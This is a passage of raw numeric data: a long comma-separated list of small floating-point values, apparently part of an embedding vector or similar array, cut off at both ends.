642153,0.024139453,-0.013525979,-0.008940144,-0.015869044,-0.01827649,0.03555548,-0.027969958,0.00025395973,-0.0013837796,0.018863099,0.021444703,0.00052587566,-0.006162294,0.005875391,-0.012349742,0.0017287445,-0.009747789,0.0010519617,0.008835633,-0.039528154,0.010329947,0.013436754,0.00048474903,-0.00886896,-0.014385696,0.0146240825,0.018818947,-0.014572666,-0.0074518714,-0.0073474334,0.027678639,0.003944011,0.0041744085,-0.0037788302,0.016286038,0.0017446347,0.023060342,-0.014272219,0.01873461,0.020020831,0.012190579,0.0033557958,-0.01752153,0.024988642,0.04458552,0.01545186,0.026235562,-0.007079748,-0.00988298,-0.014918753,0.019824164,-0.01277973,-0.017712653,0.0032000768,-0.0042162123,-0.009144691,-0.00020703489,-0.000024440942,0.00737592,-0.015363956,0.015834874,0.0018752662,-0.0037706334,-0.005511606,0.01632918,-0.01888203,0.011615733,0.012051075,-0.003951239,-0.02713021,-0.0045758765,-0.010132576,0.000037756305,0.017590223,-0.019176131,-0.01191924,0.00046384364,0.015944654,0.007646374,0.026379617,0.020369982,0.011520902,-0.0034004555,0.004075882,0.0011104571,-0.005673125,-0.0027610697,0.023508463,-0.019011067,-0.01248524,0.008374836,-0.0031072195,-0.004212316,0.0018247148,0.037353687,-0.02546607,0.0050266534,-0.0044486825,0.0003368265,0.009081464,-0.023587514,-0.006106719,-0.021183347,-0.010133442,0.0011598181,0.021866173,-0.0001612197,0.011982641,-0.00075767183,0.010441535,-0.008145733,-0.016262256,0.0022351996,-0.010765695,0.0068486365,0.0020677499,0.036790024,-0.0012697184,-0.034940667,0.015070523,-0.003415988,-0.0010969391,-0.034599148,0.048178315,0.006408222,0.011509706,0.034997497,0.022801343,0.014848571,0.008908387,0.020659862,0.028636573,0.002722839,-0.011420939,-0.0108921975,-0.019514276,-0.000025168389,0.006282901,-0.012098614,0.004131002,0.014443469,0.03875256,-0.029622389,-0.016834464,0.017515378,0.029994186,-0.039046027,0.015767323,0.01994296,-0.016487021,0.018503992,0.0071042893,0.07583325,-0.015861688,-0.016700128,-0.007600553,0.011205412,0.011779187,-0.008227367,0.028816648,-0.02826305,0.009869115,0.0174255,0.023456728,0.0070986007,0.011691471,-0.004942869,-0.010032588,0.009770785,-0.0015709123,-0.008894276,0.009789295,0.01664717,-0.012126772,-0.0153339505,-0.0064689526,0.0049219993,0.012507711,0.028456831,0.024694249,-0.009075823,-0.010520247,-0.015074287,0.0006329031,0.0053231474,0.00021053178,0.028237408,0.008438176,0.027490996,0.0068600215,-0.0072612585,0.033058677,-0.02687983,-0.0017172609,-0.019878943,0.024956807,0.0099894395,0.019046292,-0.0015339947,0.014761171,0.01341978,0.0010023421,0.0018341515,0.030611182,0.013426334,0.006200552,-0.03433099,-0.0026520984,0.008350769,0.016118351,-0.008189062,0.011667267,-0.019452117,-0.002134773,-0.0035341224,-0.0025001508,-0.005232933,-0.0008525963,0.01723223,-0.00089491764,-0.0067642643,-0.02062576,-0.0044945576,0.013973269,0.011962377,-0.010168316,0.02194965,0.01239431,-0.0025691404,0.018814148,0.003466679,-0.006239339,-0.0018817724,0.0067759776,-0.003014867,-0.011911101,0.012684787,-0.0076404903,-0.004191892,0.003951251,0.0015824852,-0.015154645,0.011901283,-0.011471052,0.019701025,0.012372636,0.011334783,0.008697585,-0.012158673,-0.025798798,-0.0064135925,0.0009111921,-0.021304531,0.0069410875,-0.015729893,0.025314981,-0.019986745,0.003220271,0.016926315,0.014263453,0.0012748872,0.0032310968,-0.0038606985,-0.04866566,0.00013516106,0.008320967,0.0052625174,-0.0072285887,0.043530457,0.016571958,0.0031370078,0.00022193526,-0.008826739,-0.026217844,0.008236427,-0.008830401,0.0074683395,0.020788446,-0.007489851,-0.032247823,-0.011298721,-0.025514882,-0.042299494,-0.018906588,0.06020605,-0.0042823446,0.0092710955,-0.0047548236,0.013542465,0.0019182737,-0.009576972,-0.01175431,-0.03617866,0.005610108,0.0137970885,-0.005109608,-0.0027545956,0.0001772381,-0.0020253137,-0.01522186,-0.03501405,0.0033084464,0.0059604314,0.009040169,-0.022632975,-0.003938344,0.010356321,-0.010674077,0.018802214,-0.02621811,0.018580824,0.0019559094,0.052664075,0.013969254,0.0074828872,-0.007618445,-0.005061154,-0.0141408965,-0.00074500835,-0.003924145,0.02578556,-0.0077689285,0.008009237,0.005304265,0.008310643,-0.00795226,-0.0048570894,0.009581899,0.029672025,0.046694368,0.014028413,0.024672152,-0.0035667764,0.0072962386,0.012390512,0.027757788,-0.011229417,0.025496384,-0.0040563312,0.006600648,0.029216552,-0.003958555,0.002512774,-0.02018154,0.00047076997,-0.0033337222,0.024343714,0.032078724,-0.009231965,0.0048215617,0.008765195,0.0029624468,0.01618059,0.0010409125,-0.012749528,-0.010909052,0.00032529,0.008423386,0.00077314145,-0.0070933783,-0.042148054,-0.0017746559,0.015175183,-0.0064455094,-0.00028731127,0.005453438,-0.022833062,0.00068017864,-0.008465246,-0.01717182,-0.011915546,0.009718365,0.030116541,-0.024135435,-0.010612635,0.00023246503,-0.014376566,-0.004820989,0.006917969,-0.015874056,-0.014503705,-0.010281835,-0.0031301195,0.026813028,0.014569445,0.022551863,-0.0038513346,-0.00352643,-0.008082511,-0.011815118,-0.008091934,0.00890295,0.008775625,0.0071796863,0.009065713,0.01954113,-0.008780352,-0.028050788,0.0033433374,0.0123718465,-0.038035825,-0.019484408,-0.023765013,0.009275322,-0.011774712,0.02688488,-0.010289191,0.0222629,0.020440215,-0.008563905,0.0068111247,-0.0033374045,0.008120459,0.021104505,0.023097426,-0.027559854,-0.012923142,-0.0058967224,0.002855803,-0.013854509,-0.00033297366,0.0104658175,-0.022261165,-0.022171594,-0.009590826,0.0056677056,-0.013375396,0.0006392161,0.012034066,-0.04432043,0.0057433215,0.0015569661,0.012986936,0.0042964458,-0.0037940452,0.0075778994,-0.02467541,0.01107411,-0.018148791,-0.005311258,0.010269025,-0.024658464,0.014165527,0.010413862,-0.03428794,-0.027453281,-0.02077085,-0.00546311,0.0014321676,0.011907318,0.0004556186,-0.03185117,-0.015684221,0.01682737,0.0010227222,0.013760517,-0.03167984,0.0061824927,-0.011123354,-0.01703723,0.000705773,0.016617125,-0.0074026682,0.018166566,-0.0075514363,-0.014820027,0.020818226,-0.0055712247,0.011343,-0.008529226,0.010101958,-0.008812662,-0.015161145,0.016617293,-0.00670678,0.00872539,0.019192964,0.014986569,0.022528127,0.024723228,-0.019243,-0.019945879,0.003908004,-0.002242483,-0.0008585555,-0.0039081355,0.0017521161,-0.0019027307,-0.0005969204,0.0029002365,0.015813656,0.0005320027,0.0011096682,0.016181447,-0.002783919,-0.028570518,-0.026269987,0.002231802,-0.006463544,0.004178196,0.004006029,-0.009297123,0.019338392,0.0296014,0.00730542,-0.012044077,0.016270805,0.0015772404,-0.016783452,0.004158282,-0.0041594864,-0.008767497,-0.0042265886,0.03559663,-0.044518143,-0.01171068,0.008139004,0.010913778,0.02085799,-0.017181737,0.0000941941,-0.009365926,0.00027442325,-0.0062686047,-0.015354314,0.0002293149,-0.020946098,0.012831859,-0.008297803,-0.006100197,0.004954207,0.0067311963,0.0046362006,0.012142356,0.009575109,0.01796687,0.0185386,-0.012614904,0.0013031822,0.00481774,0.0027648977,-0.0025296246,0.0043522785,0.0016987284,0.01754113,0.028115813,0.0012517917,0.0084761325,-0.022967849,-0.033786807,0.015543042,-0.008165448,0.0034320962,-0.024143245,0.013923103,0.011308839,-0.0064659156,-0.003279131,-0.03185812,-0.07843138,0.01470674,-0.011356088,-0.00038337882,0.0023869057,0.0033058347,-0.008878613,0.012460361,0.037745114,-0.013187208,0.014413985,0.014049653,-0.008551932,0.0042248345,0.022555513,-0.0099311415,-0.027234245,0.010813917,0.014285548,0.003012919,0.009983623,-0.0014225098,0.009240804,0.007317632,0.030673208,0.005503642,0.008863406,-0.00965903,-0.015238312,0.01629388,-0.009906211,-0.0057025636,-0.0034955884,-0.006480939,-0.021225309,-0.002905909,0.006222756,0.02423729,-0.01520113,0.006031767,-0.022204116,-0.010728815,0.0059957383,0.035549693,-0.011772039,-0.021644417,0.020922415,-0.01432489,0.01124863,-0.030926136,0.02703257,-0.00873764,-0.013499973,0.011392012,0.012144305,0.014547623,-0.013264317,0.0069562667,0.018376393,-0.0068371235,-0.003420144,-0.005102217,0.023201693,0.025535116,-0.015328186,0.0054040286,0.007901668,0.023386834,-0.014981607,-0.025170412,-0.035301916,-0.011914442,-0.0057240245,0.006414452,-0.0061202277,0.02170651,-0.013825817,-0.0036412596,-0.0073110233,-0.0013268463,-0.017173175,0.008288082,-0.027294863,0.0012614965,-0.014754903,0.001703932,-0.0062374067,0.0017800985,0.0030783087,-0.027668366,-0.029051544,0.01683273,-0.015384618,0.010351361,0.0011797772,0.019890813,-0.0017908711,0.0010933052,0.004485662,-0.0021644854,0.008755194,-0.010887458,-0.005569499,0.04793317,0.0020449774,0.0009264011,0.009957101,-0.0013505226,0.011665345,0.018234376,0.0035123734,0.011781788,0.014925333,0.008996747,0.023486184,-0.003096627,-0.0023527713,0.008823754,0.048960242,0.017205598,0.000843444,-0.007375537,0.025195748,0.016471189,-0.0007826012,0.013742942,0.013294126,0.02369196,-0.01144594,0.008066307,0.00018632223,0.02004996,0.01875336,-0.004049316,0.0052994345,0.005506683,-0.006014128,-0.0019681286,-0.018934388,0.009337739,-0.026488364,0.000049865204,-0.014968883,0.0107708825,0.010712322,-0.029254656,-0.0061919787,0.006421258,0.0033570274,0.0028514958,-0.009768918,0.0011924971,-0.0013946921,0.016485538,0.0003055754,0.0039624707,0.0057607284,-0.023818346,-0.013337737,-0.002822005,-0.015188068,-0.036768463,-0.012778272,0.004169218,-0.03405904,0.009479128,0.00042861153,-0.009764126,-0.02682975,-0.015243305,0.0096127475,0.009570682,0.019129114,0.05195265,-0.0061732247,-0.016284633,0.016647115,-0.0005041286,-0.008542321,-0.0029472066,0.0039351853,0.03900252,0.0062117307,-0.014726554,0.019003607,-0.013002298,0.017185096,-0.005644039,-0.014290858,-0.0061215456,0.0015265556,-0.00022902014,0.009380976,-0.009609053,-0.028845768,0.038706664,0.008783779,0.020704865,0.006610541,-0.006964455,-0.0077806013,0.0010908422,0.015188705,0.0106349,-0.013443407,0.0049421517,0.017328987,-0.032552566,-0.013202838,-0.0004714294,-0.0042064385,-0.022884939,0.0010968257,0.0015589002,-0.018220516,-0.0031953382,-0.02247399,-0.00361849,0.010949387,-0.019935263,0.0067223213,0.007181286,0.025896244,0.009924145,-0.010945749,-0.018367207,0.01729028,0.019668497,0.0014155486,-0.0016888274,0.02361603,0.0040295236,0.03021291,0.00663796,-0.023471031,-0.0021704142,-0.0024994083,-0.005472087,-0.008931464,-0.0044930596,0.0076472824,0.019366592,0.004729086,-0.012784089,-0.011734027,0.038789842,0.0009903663,-0.006114176,-0.004829133,0.03816095,0.0006590236,-0.00048510052,0.00038660388,-0.005534135,-0.025483403,0.0051930863,-0.04624648,-0.005406083,-0.006251684,0.004689759,-0.022314923,-0.009159088,-0.0025340384,-0.006030717,0.008280795,-0.010428366,0.0056292983,0.021076662,0.005346559,-0.009896851,0.012279152,0.0065097865,0.0050530117,-0.008042252,0.013460351,0.0050552734,-0.017757878,0.00868662,0.016607765,0.016939735,0.026922012,0.027620759,0.0067199524,-0.034781773,0.021236958,0.0023965775,0.0013582285,-0.009336133,0.019838734,-0.020832444,-0.013664808,-0.025769856,0.0052549364,-0.008878458,0.0096818665,-0.017094897,0.011728359,-0.017422285,0.0066548004,-0.0050146817,0.08801163,-0.01672366,0.0014346316,-0.011235177,0.008887389,-0.008642435,-0.0025132874,0.009420281,0.0074943877,-0.003542731,-0.030058257,-0.021893168,-0.0046943366,-0.029965643,0.02212319,-0.001426817,0.0056327716,0.014545484,-0.009940898,0.020796705,-0.002073701,0.0018906373,-0.0067434153,0.016279629,-0.008597089,0.0141964685,0.015224556,-0.021822805,0.014882876,-0.013342148,0.00090616586,0.0074018077,0.0019238641,0.015099153,-0.006357363,0.0025917927,0.0059143538,-0.00851285,-0.021114208,0.0004358279,-0.0064079603,-0.0017026729,0.046422508,0.0017575169,0.0063338378,-0.00977151,-0.012781891,-0.006153061,-0.004555431,-0.019729592,0.006622942,-0.0014872366,-0.012686641,0.0014317036,-0.030697256,0.020152468,-0.008092798,0.02217927,0.008401701,-0.0057671955,0.018586418,0.014197898,-0.014972048,-0.008892022,-0.011566894,0.019008208,-0.012533737,-0.026083244,0.00038415397,-0.019094056,0.011919903,-0.0037537317,-0.0020524978,0.013614671,-0.0024493237,0.023319159,0.011369205,-0.026049726,-0.02104549,-0.011911233,-0.008556352,-0.014156353,0.02267038,0.020042438,-0.009722381,0.0145233935,0.0089058755,0.008869019,0.07018418,0.011546406,0.034799088,-0.021639345,-0.0013747278,0.02569843,0.018865045,0.02511156,0.004203136,0.025490275,-0.031367093,0.018237766,0.008434255,0.01638248,0.01190706,-0.00964275,-0.0031664153,0.0080225505,0.0087134205,-0.024133535,-0.0021427602,0.032630466,0.015937468,0.0016880082,0.0029519924,0.016014853,-0.003069859,-0.007117657,0.008054656,-0.02295033,-0.009768321,0.01625016,0.015987761,-0.014420593,-0.015906557,-0.042832594,0.011674831,0.16214092,-0.0011143871,-0.0051145656,0.024365883,-0.0038846752,0.012290019,-0.1229345,-0.0033064014,-0.007952591,-0.00019168611,-0.014211799,-0.010571994,-0.019999307,0.017484013,0.003347705,-0.009274269,-0.012923681,-0.018613132,0.01660185,-0.017307533,-0.0072777392,0.01892108,-0.0015327109,-0.00627883,-0.04256009,-0.012798397,0.010316899,-0.014135827,-0.0110125,-0.008263625,0.0060731387,0.013084027,0.019682897,-0.0050245104,-0.016682703,0.0046727527,0.0154975625,0.001746243,-0.010620949,-0.006735651,0.022603165,-0.008917592,-0.013184988,-0.026680896,-0.16808794,-0.0020218862,-0.0017741635,-0.05362074,0.00811808,-0.014569925,0.027400583,0.0065945275,0.006571491,-0.003519872,-0.0027092586,0.027826324,-0.0048031076,-0.0044953357,-0.025255179,-0.0027734365,0.019069407,-0.010719052,0.013442166,-0.010884587,0.0136766145,0.016968768,-0.024398277,-0.013983101,-0.010979939,0.005255629,0.017463565,0.01197075,-0.014522128,-0.00059677626,-0.012315821,0.017094143,-0.016970947,-0.0090818135,-0.0051828576,-0.01158859,-0.0018242062,0.013674553,-0.010817299,0.025355723,-0.011582246,-0.008231372,0.00407549,-0.003982767,-8.6862957e-7,0.017344598,-0.0071337777,0.016867911,0.018793471,-0.001365483,0.025269806,-0.013911598,-0.026830472,0.006550187,-0.017013133,-0.020594884,-0.0016044686,-0.026736947,-0.01907786,0.0051476117,-0.0040930836,-0.02000678,-0.026722563,0.00314121,0.030435858,-0.00026354313,0.009959015,-0.036202036,-0.0029017664,0.00043542794,-0.005752894,0.0065145288,0.014408113,-0.027297957,0.016641747,0.020125553,-0.015813727,-0.00093334896,0.016410178,-0.021837113,0.023396024,-0.015008472,0.009861579,-0.035987265,-0.016836168,-0.007821465,-0.02304703,-0.010904449,-0.016206684,0.01151138,0.032701865,0.00029232932,0.032240238,0.004121652,0.007938624,0.0003707204,0.031202583,0.0013672621,-0.019466186,0.012423104,-0.0024356507,0.0037132672,-0.0014598834,-0.0025476394,-0.0053136605,0.0078789275,0.005675329,-0.022192538,-0.03416622,-0.0036302279,0.0146913305,-0.023467228,0.00055257825,0.00015207064,-0.019097414,-0.00408311,0.00934823,0.020214392,0.017372094,0.003073917,-0.032775942,0.016597947,-0.013998223,0.013285965,0.0400719,0.014404464,-0.023314342,-0.020630347,-0.0050664167,0.010648139,-0.022764223,0.01184332,-0.0012743539,-0.00026752305,-0.0068774857,-0.019299753,-0.018183555,0.012803786,-0.021313889,-0.0037093575,-0.003845312,0.0019217613,-0.01884299,-0.030452082,0.00051298307,-0.022028463,0.037559144,-0.012480441,0.024582388,0.0017048864,0.010327529,0.031688508,0.0007070709,-0.013899134,0.009552891,0.083429344,-0.0039199865,-0.0075264014,-0.0001623108,0.000338843,0.0017487884,0.01674368,-0.011230218,-0.00959608,-0.026936144,-0.026421925,0.003149543,-0.0077931085,0.024000969,-0.017712062,0.034169253,0.009771211,0.009923217,0.0032101392,0.012902966,0.020758837,-0.027159847,-0.004301618,0.030735636,0.0050783856,0.007641602,0.005759599,0.012215488,-0.015986972,-0.0014954478,-0.02249315,-0.005639555,-0.008640193,0.0046399026,0.01635841,-0.049424928,-0.021173052,0.0033822856,0.006940355,-0.018643316,-0.0018617695,0.022489011,0.010686004,-0.014741271,0.0065897917,-0.006207173,-0.027037954,0.008771561,0.009612714,-0.012671035,-0.006632584,0.017674865,0.00067827693,0.0010904678,0.013198366,-0.011349644,-0.0154434815,-0.0037634983,-0.013059909,-0.004641553,0.028063467,-0.011299436,-0.024635432,-0.004303635,-0.027005132,-0.0026035276,-0.0049715852,0.015090736,-0.013864934,0.024234157,-0.009345462,-0.015837835,-0.016090902,0.012694019,-0.00956925,-0.0010931935,-0.024184192,-0.013135933,-0.015060736,0.030223923,0.010488641,0.024866315,-0.016657999,-0.0039582727,-0.023458647,-0.057743233,-0.018523807,0.021853806,-0.02889857,0.00846476,0.014634168,0.019999167,0.0035612644,-0.0071882186,0.016006824,0.0078660315,0.0045909705,0.009361092,0.017500093,0.0025244695,0.012927953,0.020844454,-0.0033104145,-0.027121719,-0.0053687156,-0.018405693,-0.018230699,0.015870165,0.022228556,0.001990762,0.014832918,-0.026451347,0.0031141154,-0.012810885,-0.012303191,0.030940877,-0.012207385,0.013585682,0.025004746,-8.0501144e-7,-0.021370163,-0.017175967,0.008617671,0.0035251786,0.005930264,-0.0074062715,0.007767387,0.008534675,-0.03355634,0.022787996,0.015083019,0.04168714,0.0069566346,-0.008547201,-0.010667415,-0.019778809,0.02121307,0.011588859,0.013839618,0.024064776,-0.0070124287,0.010781162,-0.00796808,0.004071956,-0.0029331304,0.00057624426,0.005982107,-0.004471479,-0.026714692,-0.013797548,-0.012471295,0.0153363375,-0.007376031,-0.0051940493,-0.006012309,-0.0019957323,-0.023876848,-0.008975802,-0.020920724,-0.010750365,0.0076890686,0.02436693,0.011123103,-0.0040080654,-0.015598407,0.00043764035,0.024953421,-0.009023666,0.007580512,0.0022291066,0.017194223,-0.021198662,0.015712855,-0.0151967015,0.0048358245,-0.005616057,-0.01262482,0.01594535,-0.011279331,-0.004599223,0.00019522874,0.0052251928,-0.025057208,0.005232489,0.011676655,0.0090836035,0.0050271223,0.03470873,-0.002741504,0.0097376,-0.010102678,-0.0021585482,-0.017560173,-0.0073777484,-0.020818891,-0.008084436,0.02955171,-0.002623765,0.009316701,0.010819491,0.007649925,0.03006299,-0.006325261,-0.0026925975,-0.0028932411,-0.0044307513,-0.0068399683,-0.027279701,-0.004250528,0.009715833,-0.010922374,-0.012395925,-0.0084730685,0.0097471215,0.011591372,-0.01417532,-0.008698901,0.029466268,-0.010595861,-0.034700587,0.013698716,0.0069226306,-0.0055532786,-0.012509268,0.0018564309,0.004582492,-0.02340185,0.059993286,-0.01674585,-0.011732526,-0.001030191,0.041599397,0.0053160074,-0.011633325,-0.0049554207,-0.033474777,-0.017747173,-0.0035889305,-0.04750803,0.01937541,-0.001914166,-0.013751599,-0.010458857,0.014075274,0.0038204982,0.004631833,-0.0013156768,-0.004117504,0.0045011365,0.024172388,-0.0034687296,-0.012357,-0.04499492,-0.0006023832,0.0039839162,-0.036689185,0.015338225,0.004607889,0.014517952,-0.019530766,-0.013785423,-0.023081204,-0.009984293,-0.0076031815,-0.009371643,0.0051633758,-0.0034650827,0.032998916,0.01155879,0.0021531242,0.0067104152,-0.01689685,-0.020154515,0.010045462,0.001542386,-0.0058264686,0.012576687,-0.00063690083,0.0058195647,0.02198698,0.011032483,-0.020407071,0.028363595,0.008669368,-0.0005321663,-0.013311505,0.004942526,0.0055019334,0.008991817,-0.039847493,-0.012594557,0.030372333,0.025226528,-0.01680391,-0.015776858,0.014551626,-0.0066174786,-0.022713013,0.013476252,0.0008859201,0.018212464,-0.0030140153,-0.012170237,0.028007302,-0.02114141,-0.008164487,0.018420972,0.0075096088,-0.0042335293,-0.0008662698,-0.019635363,0.0054007825,0.031482525,-0.009682467,0.011636865,-0.0132359825,0.010394473,0.036954172,-0.009074338,0.0012843215,0.003026175,-0.005286949,-0.012538939,-0.008547556,-0.01084252,0.008887341,-0.010173801,-0.0073220474,-0.0018716928,-0.012195029,0.009771757,-0.0077593853,-0.003246205,-0.1484796,0.012993475,-0.013845137,-0.019667707,-0.018845584,-0.013180015,0.0077864607,0.032063276,-0.0063001034,-0.043185446,-0.01018791,0.02297926,0.004274484,-0.0049838307,0.0082742935,-0.0017814158,-0.026233584,-0.007908927,-0.0048518716,0.02738877,0.020320764,-0.01325397,-0.015392496,-0.0024678532,-0.0031782917,0.012004782,-0.010196638,0.0041853376,0.0064257355,0.0017562946,-0.011018898,0.0040081786,0.019348193,0.025243765,0.012872409,0.014303434,0.0011190469,0.012990298,-0.0037666995,0.012099496,0.0008589923,0.004243327,0.0055091493,0.014218559,0.025695901,0.018707797,0.015739718,0.019266156,0.0110194,0.021846369,-0.019343749,0.003821646,0.0039299214,-0.012596657,-0.019508129,-0.020626897,-0.0065648383,0.018163718,-0.003928063,0.0058832043,-0.02020772,-0.0005500812,-0.0018727728,-0.0059850537,-0.0006750916,0.0070291306,-0.0016777206,0.0053857886,-0.029260721,0.0075920643,0.0061779055,0.014774367,-0.007334713,0.0036142643,0.0039823144,0.014825074,0.0015599834,-0.0153335845,-0.011532101,0.020069525,-0.02917343,-0.0009837623,-0.0021098014,0.027138814,-0.008084036,-0.012820786,0.02992329,0.010282439,0.006131034,0.01229011,0.01619711,-0.008875335,-0.012063229,-0.0048096967,-0.017902426,0.0066178953,-0.014633505,0.02223321,0.0060263425,0.0045252806,-0.002226916,0.009193495,0.011187465,-0.027056905,-0.13108446,-0.0043039396,0.012234397,0.00018057728,-0.0056685423,-0.012864744,0.0065166657,0.0071046385,0.032806925,0.018176548,-0.010791442,0.009024569,0.007178759,-0.006095372,0.0027953517,0.016565448,-0.03360556,-0.010646795,-0.0011771575,0.0051180054,-0.008914536,-0.0060485797,-0.008738381,0.007144126,-0.0051120007,0.0002012054,-0.002054703,0.031280857,0.01955239,-0.022439592,-0.007209715,-0.0047940128,-0.0066723023,0.004162046,-0.05468562,-0.004649252,0.015886612,-0.003436407,0.012272742,0.0064485837,-0.0025322097,-0.007041584,0.028120106,0.01560948,0.002329326,-0.010021051,-0.0102096815,0.0088767605,-0.022224024,-0.011532001,0.010990904,0.012371126,-0.003428334,0.0045787357,-0.014631612,-0.019672994,0.0048157205,0.013302168,0.0064516775,0.0066074105,-0.01261531,0.018803494,-0.017205814,0.021947216,-0.010032384,0.017440725,0.0027160575,0.029304592,-0.010051318,0.007268117,0.007985346,0.019908505,0.0088679325,-0.014054731,0.02148032,0.009349708,0.0080194175,0.025265958,0.00867408,0.0046020313,0.015248171,-0.019357456,0.0055120443,0.017108021,-0.0070470413,0.0043979096,0.007306946,0.013374109,-0.021465007,0.009488352,0.02234117,0.004367537,-0.02415794,0.014493915,0.026969733,0.01671074,0.052628927,0.0022706573,-0.0076610087,-0.016073557,-0.0040855347,-0.005448531,-0.022105077,-0.008861922,-0.023259237,0.033963364,0.012139972,0.002472428,0.0007693533,-0.011962523,0.013961829,0.014146976,-0.012793626,0.0066961944,0.0067729116,-0.00471091,-0.022051042,-0.0057097315,-0.017141633,-0.012622917,0.00068432395,-0.013339225,0.00024861365,-0.0227159,-0.00045197847,-0.021515708,-0.020082496,0.037207752,-0.0032406345,-0.0013392372,0.0077797994,-0.010080407,0.027707197,-0.018192358,0.0052819853,0.011830911,-0.0021332935,0.0052486816,-0.000056557597,0.013659439,0.012231428,-0.013382024,0.010686151,-0.013591321,-0.004474184,-0.012040518,-0.019435128,-0.007507332,-0.0148172015,0.025726166,0.00021717387,-0.019266117,0.012657155,0.025741149,0.011575919,0.0019780113,-0.0070123235,-0.012037603,-0.0146275805,0.008445526,-0.011318545,0.026807902,0.03394644,-0.007550254,-0.022628615,0.00005916548,-0.0029793007,0.016421873,-0.0067923004,0.013895411,0.009370649,-0.0027783283,-0.0002221746,-0.079052545,-0.002342854,0.0019244825,0.0137356995,0.015814807,0.02156223,0.024050657,0.003129343,-0.003860712,-0.0052631297,0.005935367,0.013038593,0.01808749,-0.015705807,-0.0009005421,-0.0062389327,0.0031662427,0.033042602,-0.006067085,0.0039322646,-0.030790057,0.011866208,-0.000116275354,0.0060499916,0.004393248,-0.006424936,-0.004068616,-0.015140654,0.008312586,0.00089541875,-0.0076627643,0.008569939,-0.0060919537,0.0030625346,0.01831158,0.019040374,-0.007966045,-0.0053518903,-0.004217465,-0.0029594803,-0.0041866167,0.02080586,0.010389414,-0.01199309,-0.008874279,0.0052995556,0.01250032,-0.0011385574,-0.02508393,0.011652499,-0.0044371216,-0.00064480596,0.011153223,0.01710224,0.00903904,-0.001676779,-0.013420631,0.0038476007,-0.00066961645,-0.018435575,0.003242986,0.033594836,0.0076761795,0.012809997,-0.007780522,0.011337004,0.00030782807,0.01842458,0.01592112,0.02420715,0.026798975,-0.0010147179,0.0036420368,0.011550024,0.008996121,0.014548893,0.035098698,0.01337019,-0.0076920087,-0.012848329,0.000101459795,-0.0063014147,-0.010439972,0.0039681485,-0.00035155634,0.01309038,0.008821938,-0.016861843,0.01547213,-0.0032400186,-0.013846265,0.0037233534,-0.0043808925,0.0020928143,-0.025895512,-0.0028980165,0.009462589,0.01728221,0.0033813755,-0.0024572473,0.015573773,-0.01890948,-0.0038753853,-0.020860365,0.008350013,0.0129428,0.00679816,-0.0029647213,-0.009371201,-0.011066261,0.027751848,0.0005917981,0.018704712,-0.005123216,-0.0061454587,0.0045940126,-0.004065552,0.0072695576,0.0010880337,0.0012832382,-0.011993159,-0.0111523,0.0064858897,0.009206003,0.0018204523,-0.006419084,0.014231602,0.009370756,-0.007852233,-0.012695584,0.0007487339,0.007229734,-0.0042968285,-0.0019827513,-0.001796141,0.011809765,-0.020253526,-0.009042458,0.009750472,-0.017421182,0.006360244,0.008206203,0.00880409,-0.012681468,0.0034087365,-0.029625004,-0.012392272,-0.01430183,0.0012723408,0.018709097,-0.025954131,0.016737914,0.0053975224,0.0067531667,0.013824816,-0.0071022795,-0.01126102,0.027406996,0.0011282795,-0.0137444725,0.0050689713,0.02271437,-0.0011431931,-0.007076813,0.024710605,-0.007941831,0.015133143,-0.008766235,0.0069883927,0.012771339,-0.011062499,-0.0020670437,0.010506881,-0.00088670483,0.009003232,-0.007789261,-0.0028703746,-0.016345449,-0.007086028,-0.00051291095,0.010004331,-0.0042374707,0.01766399,-0.018807676,0.0011872852,0.013847114,-0.0010150032,-0.0016334796,0.019530017,-0.013899575,-0.008765617,0.00007074829,-0.008343497,-0.016267676,0.011917964,-0.025357876,-0.0013002106,-0.0050258897,0.004135137,-0.02244466,-0.02484663,-0.010408883,-0.10854457,0.0051002894,0.0077625792,0.0038959803,0.04224778,0.0096083665,-0.015300807,-0.010912748,-0.00004622816,0.0145814605,-0.0049871244,-0.0022641285,-0.03158041,-0.0074693947,0.029315395,-0.009978483,-0.017865665,-0.0025755845,0.012102088,-0.015288287,-0.0020359512,0.0061285263,-0.015435849,0.007879416,0.015821265,-0.001815335,-0.00810275,0.005110757,0.0054954896,-0.007226378,-0.010141,0.01045744,0.001265813,-0.0040226337,-0.0032292835,0.0020124712,0.0004163558,0.0126727335,0.015147118,-0.004367613,-0.0033154895,0.0020622034,-0.0058883275,-0.0053942665,-0.00580314,0.013973629,-0.03360394,0.0011087396,-0.0020577298,-0.0013313113,-0.0066612144,0.0025316805,-0.0012357372,-0.003699754,-0.0007381628,0.0035056141,0.020000141,-0.015208422,0.008534555,0.0030900848,-0.030317279,-0.011164831,0.00804299,-0.0050095147,0.003840538,0.010490577,-0.0015460848,0.012785746,-0.009708859,0.0054174517,-0.0076514184,-0.03412916,-0.011214856,-0.01261166,-0.0033121035,0.017436126,0.023617337,-0.0047301482,-0.0019819336,0.00080904865,0.021574857,-0.01241651,-0.003204299,0.009656662,0.020161595,0.00097127235,-0.0015440419,-0.0002902971,0.026376653,-0.009984836,-0.008677617,-0.007262937,0.0098450035,0.020048829,0.007599941,0.026693648,-0.021043269,0.011182022,0.010750925,0.013472073,-0.0047878306,0.0014984936,0.0020450812,-0.007055039,-0.014624236,-0.0004383346,0.013950462,-0.0011397786,-0.0053310357,-0.0045232517,-0.004698237,0.016772838,0.028473705,0.028094104,0.0000034519871,0.0058669904,0.01943222,0.010113894,-0.0143945245,-0.01962526,-0.021155635,-0.030409185,-0.010577421,0.03856737,0.0050317924,-0.01738284,0.0018588939,-0.0007517195,-0.0072970153,-0.002115044,-0.005017464,0.031153716,0.0033285685,0.01253305,-0.009853709,0.0147941355,-0.024848338,0.018404031,0.006973524,0.025223212,-0.005978704,-0.021294152,-0.0047694254,0.005548993,-0.017917417,0.016994396,-0.010054939,0.0017760047,0.027225995,-0.012432338,0.004620486,0.00612867,-0.0039100493,0.01798878,-0.01016972,0.012464288,0.009142475,0.0056824787,-0.013657805,0.006734974,0.002110315,0.0047199894,0.0048570647,-0.015603443,-0.018371718,0.019878536,0.007910329,-0.0030893483,-0.0040105674,-0.0025608481,-0.02866224,-0.00014204523,0.008311022,-0.0019640678,-0.013317052,-0.011084294,0.014900248,0.018579802,-0.022396008,-0.009679891,-0.015578737,0.008894243,-0.03329732,-0.021242874,-0.017816,0.00322481,0.00085118413,-0.020054126,0.015230897,-0.0006306983,0.0029208625,-0.006813102,-0.0086127715,-0.0077112764,-0.0030835099,-0.024895877,0.004854882,-0.0019489671,-0.017802699,0.020290276,0.0011448566,0.008721106,-0.021095464,0.0064996146,0.024897642,0.00011873056,-0.0040186956,0.011250468,-0.030395517,0.0045991284,-0.